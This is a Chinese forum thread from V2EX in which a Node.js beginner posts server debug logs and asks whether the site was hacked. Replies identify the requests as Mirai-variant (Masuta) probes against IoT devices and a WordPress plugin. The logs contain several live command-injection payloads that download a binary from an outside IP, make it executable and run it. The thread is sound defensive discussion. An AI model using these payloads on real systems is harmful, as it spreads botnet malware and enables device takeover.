V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
sisivol
V2EX  ›  Node.js

新手求帮忙看看 web 后台 控制台输出这些 是不是被人黑了

  •  
  •   sisivol · 2018-07-24 21:04:47 +08:00 · 5763 次点击
    这是一个创建于 2314 天前的主题,其中的信息可能已经有所发展或是发生改变。
    网站后台空闲会输出这些 进了这些 IP 看了 里面都是像文件列表一样的

    debug: Requested :: GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
    debug: Requested :: GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20dlink%27$
    debug: Requested :: GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
    debug: Requested :: GET /maker/snwrite.cgi?mac=1234;wget%20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%20exploit
    debug: Requested :: GET /wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://localhost/1.jpg$(wget$20http://178.128.11.199/qtx.mips%20-O%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz)
    2 条回复    2018-07-30 10:25:55 +08:00
    qinxi
        1
    qinxi  
       2018-07-24 22:23:25 +08:00   ❤️ 1
    只是试图让你机器帮忙挖矿而已
    ljcnaix
        2
    ljcnaix  
       2018-07-30 10:25:55 +08:00
    这是一个 Mirai 僵尸网络变种叫 Masuta,最近比较活跃,使用 5 个漏洞传播(都是针对 IoT 设备的),只有一个是针对 Wordpress 的,你的网站如果用了 Wordpress 自查一下这个漏洞( https://www.exploit-db.com/exploits/39250/)就好了,不是 Wordpress 的话更不用担心
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2678 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 03:50 · PVG 11:50 · LAX 19:50 · JFK 22:50
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.